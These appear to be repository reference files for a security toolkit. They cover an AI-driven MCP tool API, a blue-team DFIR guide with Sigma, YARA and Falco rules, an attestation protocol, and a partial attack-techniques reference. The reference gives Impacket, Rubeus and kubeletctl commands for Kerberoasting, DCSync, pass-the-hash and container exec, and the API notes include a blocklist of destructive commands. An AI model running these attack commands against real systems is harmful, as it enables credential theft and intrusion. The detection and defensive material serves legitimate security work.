| `variables` | object | No | Variables for playbook |
| `dry_run` | boolean | No | Show without executing (default: false) |
**Built-in:** `quick-recon`, `network-scan`, `mesh-health-check`, `defensive-posture`
**Returns:** `{ playbook, steps: [...], results: [...], overall_success }`
### `tactical_learn`
Record command outcome for future AI suggestions.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `command` | string | Yes | Command that was executed |
| `context` | string | No | Why this command was useful |
| `outcome` | string | Yes | `success`, `partial`, `failed`, `learned` |
| `tags` | string[] | No | Tags for categorization |
**Returns:** `{ learned: true, command, proof_id }`
---
## 5. Oracle Tools (2)
LLM-backed reasoning with deterministic fallback.
### `oracle_reason`
Analyze situation and recommend actions.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `context` | string | Yes | Situation to reason about |
| `constraints` | string[] | No | Rules to follow |
| `objective` | string | No | Primary goal |
**Returns:** `{ reasoning: { analysis, recommendations: [...], confidence }, proof_id }`
### `oracle_decide`
Make decision based on options and risk tolerance.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `situation` | string | Yes | Situation requiring decision |
| `options` | string[] | Yes | Available options |
| `risk_tolerance` | string | No | `minimal`, `low`, `medium`, `high`, `maximum` |
**Returns:** `{ decision: { selected, reasoning, confidence }, proof_id }`
---
## 6. Chain Tools (1)
End-to-end orchestration pipeline.
### `oracle_tactical_chain`
Full "reason → decide → act" chain with cryptographic proof.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `context` | string | Yes | Situation to analyze |
| `constraints` | string[] | No | Oracle constraints |
| `objective` | string | No | Goal |
| `options` | string[] | No | Decision options (defaults provided) |
| `playbook` | string | No | Playbook if action selected |
| `risk_tolerance` | string | No | Risk level (default: `low`) |
| `dry_run` | boolean | No | Plan only (default: `true`) |
**Returns:**
```json
{
"chain_id": "chain-...",
"reasoning": { "summary": "...", "confidence": 0.8 },
"decision": { "selected": "Run diagnostic", "risk_tolerance": "low" },
"tactical_plan": { "type": "playbook", "executed": false },
"proofs": { "reason": "...", "decide": "...", "chain": "..." }
}
```
---
## 7. Recon Tools (3)
Reconnaissance with guardrails and proof trails.
### `recon_passive`
Passive reconnaissance - no target interaction.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `target` | string | Yes | Domain, IP, or org identifier |
| `modules` | string[] | No | `dns`, `whois`, `certs`, `all` |
**Returns:** `{ type: "passive", target, findings: { dns, whois, certs }, proof_id }`
### `recon_active`
Active reconnaissance - requires authorization.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `target` | string | Yes | IP, domain, or range |
| `scan_type` | string | No | `ports`, `services`, `vuln`, `full` |
| `authorization` | string | Yes | Auth reference (ticket, contract ID) |
| `execute` | boolean | No | Actually run (default: `false` = prepare only) |
**Returns:** `{ type: "active", target, status, command, output (if executed), proof_id }`
### `recon_wifi`
WiFi reconnaissance - environment-aware.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `interface` | string | No | Wireless interface (auto-detected) |
| `mode` | string | No | `scan`, `monitor`, `deauth_detect`, `rogue_detect` |
| `duration` | number | No | Duration in seconds |
**Returns:** `{ type: "wifi", environment: { isTermux, isNetHunter }, findings: { networks }, proof_id }`
---
## 8. Agent Tools (5)
Autonomous background tasks and config management.
### `agent_task`
Create autonomous task with triggers.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `name` | string | Yes | Task name |
| `trigger` | object | Yes | `{ type, interval }` |
| `trigger.type` | string | Yes | `schedule`, `event`, `condition`, `mesh`, `once` |
| `trigger.interval` | number | No | Interval in seconds (for schedule) |
| `actions` | array | Yes | Array of `{ tool, args }` |
| `on_complete` | string | No | `notify`, `mesh_broadcast`, `log`, `chain`, `none` |
| `max_runs` | number | No | Max executions (0 = unlimited) |
**Returns:** `{ success: true, task: {...}, proof_id }`
### `agent_list`
List agent tasks by status.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `status` | string | No | `all`, `active`, `pending`, `completed`, `cancelled`, `disabled` |
**Returns:** `{ count, tasks: [...], stats: { total_tasks, active, pending } }`
### `agent_cancel`
Cancel an active task.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `task_id` | string | Yes | Task ID to cancel |
**Returns:** `{ success: true, task: {...}, proof_id }`
### `agent_reload_configs`
Reload agent configs from `configs/agents/*.yaml`.
**No parameters.** Returns: `{ success: true, config_dir, tasks_loaded: [...], count }`
### `agent_config_toggle`
Enable/disable config-sourced agent at runtime.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `name` | string | Yes | Agent name |
| `enabled` | boolean | Yes | Enable or disable |
| `persist` | boolean | No | Write to YAML file (default: false) |
**Returns:** `{ success: true, name, previous_status, new_status, persisted, proof_id }`
---
## 9. Mobile Tools (2)
Termux/NetHunter body awareness.
### `mobile_status`
Get device status including battery, WiFi, network, VPN.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `include` | string[] | No | `battery`, `wifi`, `network`, `vpn`, `location`, `sensors`, `all` |
**Returns:**
```json
{
"environment": { "isTermux": true, "isNetHunter": false, "platform": "android" },
"data": {
"battery": { "percentage": 85, "status": "DISCHARGING" },
"wifi": { "ssid": "Home", "rssi": -65 },
"vpn": { "tailscale": { "connected": true }, "any_connected": true }
},
"assessment": { "status": "healthy", "issues": [], "recommendations": [] },
"proof_id": "..."
}
```
### `mobile_execute`
Execute mobile-specific command with safety guardrails.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `command` | string | Yes | Command to execute |
| `background` | boolean | No | Run in background (default: false) |
| `timeout` | number | No | Timeout in ms (default: 30000) |
**Blocked:** `rm -rf /`, `dd if=/dev/zero`, `mkfs`, fork bombs
**Returns:** `{ command, risk_level, success, output, proof_id }`
---
## Proof Trail Actions
Every significant tool call emits a cryptographic proof:
| Action Pattern | Tool |
|----------------|------|
| `proof:generate` | proof_generate |
| `mesh:status` | mesh_status |
| `shield:status` | shield_status |
| `tactical:execute` | tactical_execute |
| `oracle:reason` | oracle_reason |
| `oracle:decide` | oracle_decide |
| `chain:oracle_tactical_chain` | oracle_tactical_chain |
| `recon:passive` | recon_passive |
| `recon:active` | recon_active |
| `agent:task:create` | agent_task |
| `agent:config:load` | agent_reload_configs |
| `mobile:status` | mobile_status |
Access proof log via MCP resource: `sovereign://proofs/log`

View File

@@ -0,0 +1,363 @@
# Blue Team Operations Reference
DFIR methodologies, Sigma rules, detection engineering, and forensic analysis.
## NIST SP 800-61r3 + CSF 2.0 Framework
| Function | IR Activities |
|----------|---------------|
| **Govern** | IR policies, roles, governance structures |
| **Identify** | Asset inventory, risk assessment, incident types |
| **Protect** | Safeguards, communication protocols, forensic readiness |
| **Detect** | Monitor, anomaly detection, alert triage |
| **Respond** | Containment, eradication, evidence collection |
| **Recover** | Restore capabilities, lessons learned |
### SANS PICERL Lifecycle
1. **Preparation** — Plans, tools, training
2. **Identification** — Detect and validate
3. **Containment** — Limit damage
4. **Eradication** — Remove threat
5. **Recovery** — Restore operations
6. **Lessons Learned** — Improve
## Chain of Custody
### Requirements
1. Document who collected evidence, when, where
2. Record every transfer of custody
3. Store in tamper-evident containers
4. Use cryptographic hashes (SHA-256)
5. Maintain detailed logs
6. Train personnel on procedures
**Standards:** ISO/IEC 27037:2012, NIST SP 800-86
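A minimal bash sketch of the hashing and logging steps above (file and log names are placeholders):
```bash
# Hash acquired evidence and append a custody-log entry
EVIDENCE="evidence/disk01.dd"
sha256sum "$EVIDENCE" | tee -a custody.log
printf 'collected_by=%s host=%s time=%s item=%s\n' \
  "$USER" "$(hostname)" "$(date -u +%Y-%m-%dT%H:%M:%SZ)" "$EVIDENCE" >> custody.log
```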
## Memory Forensics
### Volatility 3 (Python 3)
```bash
# Install
pip install volatility3
# Basic analysis
vol -f memory.raw windows.info
vol -f memory.raw windows.pslist
vol -f memory.raw windows.psscan
vol -f memory.raw windows.netscan
vol -f memory.raw windows.malfind
vol -f memory.raw windows.dlllist
vol -f memory.raw windows.handles
vol -f memory.raw windows.cmdline
vol -f memory.raw windows.filescan
```
### Key Plugins
| Plugin | Purpose |
|--------|---------|
| `windows.pslist` | Active processes via kernel list |
| `windows.psscan` | Find hidden/terminated processes |
| `windows.netscan` | Network connections and sockets |
| `windows.malfind` | Detect code injection |
| `windows.dlllist` | Loaded DLLs per process |
| `windows.handles` | Open handles (files, registry, mutexes) |
| `windows.cmdline` | Command line arguments |
| `windows.hashdump` | Extract password hashes |
### Acquisition Tools
- **DumpIt / WinPMEM** — Windows memory acquisition
- **LiME** — Linux kernel module acquisition
- **AVML** — Rust-based Linux acquisition
- **Belkasoft RAM Capturer** — Bypass anti-dumping
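For the Linux tools above, acquisition typically looks like the following sketch (module and output paths are placeholders):
```bash
# LiME: load the kernel module and dump memory in lime format
sudo insmod ./lime-$(uname -r).ko "path=/mnt/evidence/mem.lime format=lime"
# AVML: userspace acquisition, no kernel module needed
sudo ./avml /mnt/evidence/mem.avml
# Hash images immediately for chain of custody
sha256sum /mnt/evidence/mem.*
```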
## Disk Forensics
### Tool Comparison
| Tool | Best For | License |
|------|----------|---------|
| Autopsy | Open-source, budget teams | Free |
| EnCase | Law enforcement, court-proven | Commercial |
| FTK | High-volume, email focus | Commercial |
| FTK Imager | Evidence acquisition | Free |
| X-Ways | Portable, power users | Commercial |
### Autopsy Workflow
```bash
# Install
sudo apt install autopsy
# Start
autopsy
# Navigate to http://localhost:9999/autopsy
```
### Sleuth Kit Commands
```bash
# Image info
img_stat image.dd
# File system info
fsstat -o 2048 image.dd
# List files
fls -o 2048 image.dd
# File recovery
icat -o 2048 image.dd <inode> > recovered_file
# Timeline
fls -m "/" -r image.dd > body.txt
mactime -b body.txt > timeline.csv
```
## Velociraptor & KAPE
### Velociraptor
```yaml
# VQL Query Example - Find suspicious processes
SELECT Pid, Name, Exe, CommandLine, CreateTime
FROM pslist()
WHERE Name =~ "powershell|cmd|wscript|cscript"
AND CommandLine =~ "-enc|-e |-nop|-w hidden"
```
### KAPE
```bash
# Triage collection
kape.exe --tsource C: --tdest E:\Collection --target KapeTriage
# With processing
kape.exe --tsource C: --tdest E:\Collection --target KapeTriage --mdest E:\Processed --module !EZParser
```
### KAPE Targets
- `KapeTriage` — Comprehensive Windows triage
- `RegistryHives` — All registry hives
- `EventLogs` — Windows event logs
- `WebBrowsers` — Browser artifacts
- `Antivirus` — AV logs and quarantine
## Sigma Rules
### Rule Structure
```yaml
title: LSASS Memory Dump via Procdump
id: e1a6c9c7-8c8d-4b5c-9a2e-1234567890ab
status: stable
description: Detects LSASS memory dumping using Procdump
references:
- https://attack.mitre.org/techniques/T1003/001/
author: Security Analyst
date: 2024/11/29
tags:
- attack.credential_access
- attack.t1003.001
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\procdump.exe'
CommandLine|contains: 'lsass'
condition: selection
falsepositives:
- Legitimate troubleshooting
level: high
```
### Sigma CLI
```bash
# Install
pip install sigma-cli pysigma-backend-splunk pysigma-backend-elasticsearch
# Convert to Splunk SPL
sigma convert -t splunk -p sysmon rule.yml
# Convert to Elastic/Lucene
sigma convert -t lucene -p ecs_windows rule.yml
# Batch convert to Elastic Security
sigma convert -t lucene -p ecs_windows -f siem_rule_ndjson ./rules/ -o rules.ndjson
```
### Common Detection Patterns
#### Credential Access
```yaml
title: Mimikatz Sekurlsa
detection:
selection:
CommandLine|contains:
- 'sekurlsa::'
- 'kerberos::'
- 'lsadump::'
condition: selection
```
#### PowerShell Download
```yaml
title: PowerShell Download Cradle
detection:
selection:
CommandLine|contains:
- 'DownloadString'
- 'DownloadFile'
- 'IEX'
- 'Invoke-Expression'
condition: selection
```
#### Scheduled Task Creation
```yaml
title: Suspicious Scheduled Task
detection:
selection:
Image|endswith: '\schtasks.exe'
CommandLine|contains:
- '/create'
filter:
User|contains: 'SYSTEM'
condition: selection and not filter
```
## Critical Windows Event IDs
| Event ID | Category | Description |
|----------|----------|-------------|
| 4624 | Logon | Successful logon (check LogonType) |
| 4625 | Logon | Failed logon |
| 4672 | Logon | Special privileges assigned |
| 4688 | Process | Process creation (enable command line logging) |
| 4697 | Service | Service installed |
| 4698 | Task | Scheduled task created |
| 4720 | Account | User account created |
| 4732 | Group | Member added to local group |
| 5140 | Share | Network share accessed |
| 7045 | Service | Service installed (System log) |
### Logon Types (Event 4624)
| Type | Description |
|------|-------------|
| 2 | Interactive (local) |
| 3 | Network (SMB, etc.) |
| 4 | Batch (scheduled tasks) |
| 5 | Service |
| 7 | Unlock |
| 10 | RemoteInteractive (RDP) |
| 11 | CachedInteractive |
## Threat Hunting with ATT&CK
### Methodology
1. **Develop Hypothesis** — Based on threat intel and risk
2. **Determine Data** — Identify required log sources
3. **Build Analytics** — Create detection queries
4. **Execute Hunt** — Search historical/real-time data
5. **Validate Findings** — Distinguish true/false positives
6. **Document** — Convert to automated detections
### Key Resources
- **ATT&CK Navigator** — Visualize coverage
- **MITRE CAR** — Detection analytics repository
- **Atomic Red Team** — Technique test scripts
- **CALDERA** — Automated adversary emulation
## Timeline Analysis
### Plaso/log2timeline
```bash
# Create timeline
log2timeline.py --storage-file timeline.plaso image.dd
# Filter and output
psort.py -o dynamic -w timeline.csv timeline.plaso
```
### Timesketch
Web-based collaborative timeline analysis:
- Import Plaso timelines
- Search and filter events
- Add annotations and tags
- Share with team
## YARA Rules
### Rule Structure
```yara
rule Mimikatz_Memory {
meta:
description = "Detects Mimikatz in memory"
author = "Security Analyst"
reference = "https://github.com/gentilkiwi/mimikatz"
strings:
$s1 = "sekurlsa" ascii wide
$s2 = "kerberos" ascii wide
$s3 = "gentilkiwi" ascii wide
$s4 = "Benjamin DELPY" ascii wide
condition:
2 of them
}
```
### Usage
```bash
# Scan file
yara rules.yar suspicious_file.exe
# Scan directory
yara -r rules.yar /path/to/scan/
# With Volatility
vol -f memory.raw windows.yarascan --yara-rules="Mimikatz_Memory"
```
## Quick Reference Commands
### Windows
```powershell
# Running processes
Get-Process | Select-Object Id, ProcessName, Path, CommandLine
# Network connections
Get-NetTCPConnection | Where-Object State -eq 'Established'
# Recent files
Get-ChildItem -Path C:\Users -Recurse -Force | Where-Object {$_.LastWriteTime -gt (Get-Date).AddDays(-1)}
# Scheduled tasks
Get-ScheduledTask | Where-Object State -eq 'Ready'
# Services
Get-Service | Where-Object StartType -eq 'Automatic'
# Event logs
Get-WinEvent -FilterHashtable @{LogName='Security';ID=4624} -MaxEvents 100
```
### Linux
```bash
# Running processes
ps auxf
# Network connections
ss -tulpn
netstat -tulpn
# Recent files
find / -mtime -1 -type f 2>/dev/null
# Cron jobs
crontab -l
cat /etc/crontab
ls -la /etc/cron.*
# Auth logs
grep "Accepted\|Failed" /var/log/auth.log
# Login history
last -a
lastlog
```

View File

@@ -0,0 +1,319 @@
# Braid Mode Reference
Mutual attestation protocol between Shield (OFFSEC-MCP) and VaultMesh.
---
## 1. Protocol Overview
Each system periodically imports the other's Merkle root and embeds it in `ROOT.txt`:
```
Shield VaultMesh
│ │
│── import VaultMesh root ──────►│
│ │
│◄────── import Shield root ─────│
│ │
▼ ▼
ROOT.txt: ROOT.txt:
## Foreign Roots ## Foreign Roots
foreign_system: vaultmesh foreign_system: shield
```
**Key property:** To lie about one ledger's past, an attacker must rewrite **both** ledgers (and external anchors).
---
## 2. Foreign Root Schema (v1.0)
### Canonical Fields
| Field | Type | Description |
|-------|------|-------------|
| `ledger_name` | string | Logical name (`vaultmesh`, `shield`) |
| `source_node_id` | string | ID from foreign node |
| `root_hex` | string | 64-char hex SHA256 Merkle root |
| `source_ts` | string | RFC3339 timestamp from the foreign node |
| `proof_count` | integer | Total proofs at foreign root |
| `captured_at` | string | Local RFC3339 timestamp |
| `proof_id` | string | Local proof ID for import |
| `schema_version` | string | Currently `"1.0"` |
| `source_url` | string | Foreign `/api/root` URL |
### ROOT.txt Section
```text
## Foreign Roots
foreign_roots_schema: 1.0
braid_mode: enabled
### vaultmesh
foreign_system: vaultmesh
foreign_node_id: vm-node-1
foreign_root_hex: a1b2c3d4e5f6...
foreign_root_ts: 2025-11-30T17:45:00.000Z
foreign_proof_count: 142
captured_at: 2025-11-30T17:50:00.000Z
capture_proof_id: proof-abc123
```
---
## 3. Braid Invariants
### Invariant A — Monotonic Foreign Time
For each `(ledger_name, source_node_id)`:
```
source_ts(n+1) > source_ts(n)
```
Violation → `ROOT_REGRESSION`
### Invariant B — Non-decreasing Proof Count
For each `(ledger_name, source_node_id)`:
```
proof_count(n+1) >= proof_count(n)
```
Violation → `PROOF_COUNT_REGRESSION`
### Invariant C — Append-Only Local Log
- No deletion of braid entries
- No rewriting historical records
- Corrections are new entries with `kind: "rejected"`
### Invariant D — Identity Stability
- Change in `source_node_id` → `IDENTITY_SHIFT`
- Must be handled via policy, not silently accepted
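A minimal sketch of checking Invariants A and B over an exported BraidStore (the `braid-store.json` export path and use of `jq` are assumptions; record fields follow section 8):
```bash
# Flag entries whose source_ts or proof_count regressed versus the previous
# capture for the same (ledger_name, source_node_id) pair (illustrative only)
jq -r '
  group_by(.ledger_name + "/" + .source_node_id)[]
  | sort_by(.captured_at)
  | . as $recs
  | range(1; ($recs | length)) as $i
  | select(($recs[$i].source_ts <= $recs[$i - 1].source_ts)
        or ($recs[$i].proof_count < $recs[$i - 1].proof_count))
  | "violation: \($recs[$i - 1].id) -> \($recs[$i].id)"
' braid-store.json
```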
---
## 4. Braid States
| State | Description |
|-------|-------------|
| **none** | No foreign roots captured |
| **one_way** | Only one side has captured |
| **bidirectional** | Both captured at least one root |
| **verified** | Bidirectional + no regressions + anchors match |
| **closed** | Each ROOT.txt referenced in other's history (loop) |
---
## 5. Incident Classes
### ROOT_REGRESSION (CRITICAL)
**Trigger:** Foreign `source_ts` decreased
**Signals:**
- BraidStore: `status: "rejected"`, `warnings: ["ROOT_REGRESSION"]`
- `braid-check` reports regression
**Impact:** Possible rollback, fork, or tampering on foreign side
### PROOF_COUNT_REGRESSION (CRITICAL)
**Trigger:** Foreign `proof_count` decreased
**Signals:** Same as above with `"PROOF_COUNT_REGRESSION"` in warnings
**Impact:** History truncation or rewrite on foreign side
### SCHEMA_INVALID (WARNING)
**Trigger:** Malformed foreign payload (missing fields, bad format)
**Signals:** Import error, `status: "rejected"`, `"SCHEMA_INVALID"` warning
**Impact:** Incompatible or misconfigured foreign node
### NETWORK_ERROR (WARNING → CRITICAL)
**Trigger:** Fetch failure (timeout, refused, TLS/DNS errors)
**Signals:** Import throws, `"NETWORK_ERROR"` warning
**Impact:** Degraded freshness; CRITICAL if sustained
### IDENTITY_SHIFT (CRITICAL)
**Trigger:** Foreign `node_id` differs from previous
**Signals:** `"IDENTITY_SHIFT"` warning
**Impact:** Node re-provisioned, restored, or compromised
### CLOCK_DRIFT_SUSPECT / CLOCK_DRIFT_SEVERE (WARNING / CRITICAL)
**Trigger:** Foreign timestamps deviate from wall-clock
**Impact:** Braid ordering may not reflect real-world order
### ANCHOR_DIVERGENCE (CRITICAL)
**Trigger:** External anchors don't match internal roots
**Impact:** Post-anchor tampering or misconfiguration
### FLOOD_SUSPECT (INFO/WARNING)
**Trigger:** Repeated identical or trivial updates
**Impact:** Noise, resource waste, possible abusive peer
---
## 6. Incident Runbooks
### ROOT_REGRESSION Runbook
1. **Confirm** — Run `npm run braid:check`, inspect BraidStore
2. **Freeze trust** — Do not treat newer foreign roots as authoritative
3. **Cross-check** — Verify external anchors if any
4. **Coordinate** — Send to foreign operator:
- Last good root (timestamp, proof_count)
- Regressed root and evidence
5. **Document** — Open incident with braid IDs and timeline
6. **Resume** — Only when foreign stabilizes with `source_ts > last_good_ts` AND `proof_count >= last_good_count`
### PROOF_COUNT_REGRESSION Runbook
Same as ROOT_REGRESSION — strong signal of data loss or truncation.
### SCHEMA_INVALID Runbook
1. Fetch foreign `/api/root` manually
2. Identify missing/invalid fields
3. Mark foreign incompatible
4. Open issue to align `schema_version`
5. Reject until fixed
### NETWORK_ERROR Runbook
1. Check local network (DNS, firewall, routing)
2. Verify foreign node reachable
3. Short outages: log, auto-retry
4. Long outages: escalate as CRITICAL
### IDENTITY_SHIFT Runbook
1. Confirm `source_node_id` differs
2. Ask: Planned re-provisioning or unexpected?
3. If planned: treat as new ledger, preserve old history
4. If unplanned: freeze trust, investigate
5. Document decision
---
## 7. API Contracts
### Shield `/api/root`
```json
{
"nodeId": "offsec-mcp-genesis",
"root_hash": "7ad7c892...",
"batch_id": "batch-...",
"proof_count": 142,
"root_txt_sha256": "632904d2...",
"ts": "2025-11-30T17:50:45.362Z"
}
```
### VaultMesh `/api/proof/root`
```json
{
"schema_version": "1.0",
"node_id": "vaultmesh-node-1",
"root_hex": "46b3d021...",
"ts": "2025-11-30T17:50:45.362Z",
"proofchain_id": "proofchain:2025-11-30",
"root_file": "receipts/ROOT.txt",
"proof_count": 142
}
```
---
## 8. BraidStore Record Structure
```json
{
"id": "braid-<timestamp>-<random>",
"ledger_name": "vaultmesh",
"root_hex": "<64-hex>",
"source_node_id": "vaultmesh-node-1",
"source_ts": "2025-11-30T17:45:00.000Z",
"source_url": "http://vaultmesh:9110/api/root",
"proof_count": 142,
"captured_at": "2025-11-30T17:50:00.000Z",
"proof_id": "proof-abc123",
"schema_version": "1.0",
"kind": "import", // import | repeat | rejected
"status": "ok", // ok | warning | rejected
"warnings": [],
"parent_braid_id": null,
"local_root_hex_at_import": "<ShieldRootAtCapture>",
"local_receipt_index": 123,
"created_at": "2025-11-30T17:50:00.000Z"
}
```
---
## 9. Braid Hash Computation
```
BRAID_HASH = SHA256( L_root || F_root || captured_at )
```
Where:
- `L_root` — local Merkle root at capture
- `F_root` — foreign root imported
- `captured_at` — RFC3339 timestamp
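A minimal sketch, assuming the three components are concatenated as plain strings before hashing (the exact byte encoding is an implementation detail not specified here):
```bash
L_ROOT="<local-merkle-root-hex>"
F_ROOT="<foreign-root-hex>"
CAPTURED_AT="2025-11-30T17:50:00.000Z"
printf '%s%s%s' "$L_ROOT" "$F_ROOT" "$CAPTURED_AT" | sha256sum | awk '{print $1}'
```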
---
## 10. Chaos Drills
### Drill A — Happy Path
1. Start mock: `npm run mock:vaultmesh`
2. Import: `proof_braid_import` with normal URL
3. Validate: `npm run braid:check` → "no issues"
4. Check ROOT.txt has `## Foreign Roots` section
### Drill B — Regression Attack
1. First import from `?mode=normal`
2. Second import from `?mode=regress`
3. Validate: `npm run braid:check` → reports issues
4. Inspect: BraidStore shows `status: "rejected"`, warnings
### Drill B+ — Recovery
5. Import normal again
6. Latest entry should have `status: "ok"`, greater timestamps
---
## 11. Agent Automation
```yaml
name: braid_sync
trigger:
type: schedule
interval_seconds: 300
actions:
- tool: proof_braid_import
args: {url: "${vaultmesh_url}", ledger_name: "vaultmesh"}
- tool: proof_braid_emit
args: {target_ledger: "vaultmesh"}
- tool: proof_root
args: {}
on_complete: log
enabled: false
```
### Safety Rails
- **Allowed hosts:** Validate URLs against allow-list
- **Minimum interval:** Enforce ≥60 seconds
- **No auto-healing:** Agent must not rewrite or delete entries
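A minimal sketch of the allow-list rail, assuming the agent extracts the hostname from the configured URL before calling `proof_braid_import`:
```bash
# Reject braid imports from hosts not on the allow-list (illustrative only)
ALLOWED_HOSTS="vaultmesh shield.internal"
url="${vaultmesh_url:-http://vaultmesh:9110/api/root}"
host=$(printf '%s' "$url" | sed -E 's#^[a-z]+://([^:/]+).*#\1#')
case " $ALLOWED_HOSTS " in
  *" $host "*) echo "host $host allowed" ;;
  *)           echo "host $host rejected" >&2; exit 1 ;;
esac
```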
---
## 12. Verification
### One-Way Braid Verification
1. Obtain A's ROOT.txt and Merkle root
2. Parse `## Foreign Roots`, find B's entry
3. Fetch proof by `capture_proof_id`
4. Verify proof inclusion in Merkle tree
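Steps 1-2 can be sketched with `curl` and `grep` (host, port, and paths follow the examples in sections 2, 7, and 8 and may differ in a real deployment):
```bash
# Current root published by B (VaultMesh)
curl -s http://vaultmesh:9110/api/proof/root | jq -r '.root_hex'
# Entry recorded for B inside A's ROOT.txt
grep -A 6 '^### vaultmesh' receipts/ROOT.txt | grep 'foreign_root_hex'
```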
### Bidirectional Verification
1. Verify A→B (as above)
2. Verify B→A (symmetric)
3. Confirm no invariant violations
### Closed Braid Verification
1. Verify both imports
2. Confirm ordering (t0 < t1 < t2)
3. Each root appears in other's history
---
## 13. External Anchoring
Braid + external anchors (BTC/OTS, ETH) strengthen guarantees:
1. A's root anchored externally
2. B imports A's root
3. Tampering requires rewriting both logs + external anchors
Verify anchors via `proof_anchor_verify` or anchor-specific tools.

View File

@@ -0,0 +1,398 @@
# Specialized Security Domains Reference
Domain-specific techniques for AD, Cloud, K8s, Mobile, Wireless, OT/ICS, and API security.
## Active Directory Security
### Attack Techniques
| Attack | Description | Tools | ATT&CK |
|--------|-------------|-------|--------|
| Kerberoasting | Crack TGS tickets for SPNs | GetUserSPNs.py, Rubeus | T1558.003 |
| AS-REP Roasting | Target accounts without pre-auth | GetNPUsers.py, Rubeus | T1558.004 |
| Pass-the-Hash | Auth with NTLM hash | Mimikatz, Impacket | T1550.002 |
| Pass-the-Ticket | Inject stolen Kerberos tickets | Rubeus, Mimikatz | T1550.003 |
| DCSync | Simulate DC replication | secretsdump.py, Mimikatz | T1003.006 |
| NTLM Relay | Relay captured NTLM auth | ntlmrelayx.py, Responder | T1557.001 |
| Golden Ticket | Forge TGT with KRBTGT hash | Mimikatz, ticketer.py | T1558.001 |
| Silver Ticket | Forge TGS for specific service | Mimikatz, Rubeus | T1558.002 |
### BloodHound
```bash
# Collect data
SharpHound.exe -c All
bloodhound-python -d domain.local -u user -p pass -c All
# Neo4j + BloodHound GUI
neo4j console
bloodhound
```
### Key Queries
- Shortest Path to Domain Admin
- Find Kerberoastable Users
- Unconstrained Delegation Computers
- GPO Abuse Paths
- High Value Targets
### Impacket
```bash
# Kerberoasting
GetUserSPNs.py domain.local/user:pass -request -outputfile hashes.txt
# AS-REP Roasting
GetNPUsers.py domain.local/ -usersfile users.txt -format hashcat
# DCSync
secretsdump.py domain.local/admin:pass@dc.domain.local
# Pass-the-Hash
psexec.py domain.local/admin@target -hashes :NTLM_HASH
wmiexec.py domain.local/admin@target -hashes :NTLM_HASH
```
### Rubeus (Windows)
```powershell
# Kerberoasting
Rubeus.exe kerberoast /outfile:hashes.txt
# AS-REP Roasting
Rubeus.exe asreproast /format:hashcat
# Pass-the-Ticket
Rubeus.exe ptt /ticket:ticket.kirbi
# Request TGT
Rubeus.exe asktgt /user:admin /password:pass
```
## Cloud Security
### AWS Security
#### Common Misconfigurations
- S3 buckets with public access
- Overly permissive IAM policies
- Unencrypted EBS volumes
- Security groups with 0.0.0.0/0
- CloudTrail disabled
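Quick `aws` CLI spot checks for the items above (bucket and trail names are placeholders; credentials are assumed to be configured):
```bash
# S3 public access configuration for a bucket
aws s3api get-public-access-block --bucket my-bucket
# Security groups open to the world
aws ec2 describe-security-groups \
  --filters Name=ip-permission.cidr,Values=0.0.0.0/0 \
  --query 'SecurityGroups[].GroupId'
# CloudTrail status
aws cloudtrail describe-trails
aws cloudtrail get-trail-status --name my-trail
```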
#### Tools
```bash
# ScoutSuite - Multi-cloud audit
scout aws
# Prowler - AWS CIS benchmark
prowler
# Pacu - AWS exploitation
pacu
> import_keys
> run iam__enum_users_roles_policies_groups
> run iam__privesc_scan
```
### Azure Security
#### Enumeration
```bash
# ROADtools
roadrecon auth -u user@tenant.onmicrosoft.com -p pass
roadrecon gather
roadrecon gui
# AzureHound (BloodHound)
azurehound -u user@tenant.com -p pass list
```
#### Common Attacks
- App registration abuse
- Managed identity privilege escalation
- Storage account key access
- KeyVault secret extraction
### GCP Security
#### Enumeration
```bash
# GCP IAM enumeration
gcloud projects list
gcloud iam service-accounts list
gcloud compute instances list
# ScoutSuite
scout gcp
```
## Container & Kubernetes Security
### Container Escape Techniques
| Technique | Description | Detection |
|-----------|-------------|-----------|
| Privileged Container | Full host access | Pod security policies |
| hostPID/hostNetwork | Namespace sharing | Admission controllers |
| Mounted /var/run/docker.sock | Docker API access | Falco rules |
| Kernel exploits | CVE-based escapes | Patching, runtime security |
| Writable hostPath | Host filesystem access | PSP/PSA |
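From inside a suspect container, a few quick checks for the indicators above (a defensive sketch assuming a standard Linux container):
```bash
# Docker socket mounted into the container?
test -S /var/run/docker.sock && echo "docker.sock exposed"
# Effective capabilities (a full bounding set suggests --privileged)
grep CapEff /proc/self/status
capsh --decode="$(awk '/CapEff/ {print $2}' /proc/self/status)" 2>/dev/null
# Shared host PID namespace? (PID 1 shows the host init, e.g. systemd)
ps -p 1 -o comm=
```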
### Kubernetes Attack Tools
```bash
# Kube-hunter - Penetration testing
kube-hunter --remote <cluster>
# Kubeaudit - Security audit
kubeaudit all
# Peirates - K8s pentesting
peirates
# kubeletctl - Kubelet exploitation
kubeletctl pods -s <node_ip>
kubeletctl exec /bin/bash -p <pod> -c <container> -s <node_ip>
```
### Falco Rules
```yaml
- rule: Terminal shell in container
desc: A shell was spawned in a container
condition: container and proc.name in (shell_binaries)
output: Shell spawned in container (user=%user.name container=%container.name)
priority: WARNING
tags: [container, shell]
- rule: Sensitive file access
desc: Sensitive file opened for reading
condition: open_read and container and (
fd.name startswith /etc/shadow or
fd.name startswith /etc/passwd
)
output: Sensitive file opened (file=%fd.name container=%container.name)
priority: WARNING
```
### Pod Security Standards
```yaml
# Restricted (production)
apiVersion: v1
kind: Pod
spec:
securityContext:
runAsNonRoot: true
seccompProfile:
type: RuntimeDefault
containers:
- name: app
securityContext:
allowPrivilegeEscalation: false
capabilities:
drop: ["ALL"]
readOnlyRootFilesystem: true
```
## Mobile Security
### Android Testing
#### Tools
- **Frida** — Dynamic instrumentation
- **Objection** — Runtime mobile exploration
- **drozer** — Android security assessment
- **apktool** — APK decompilation
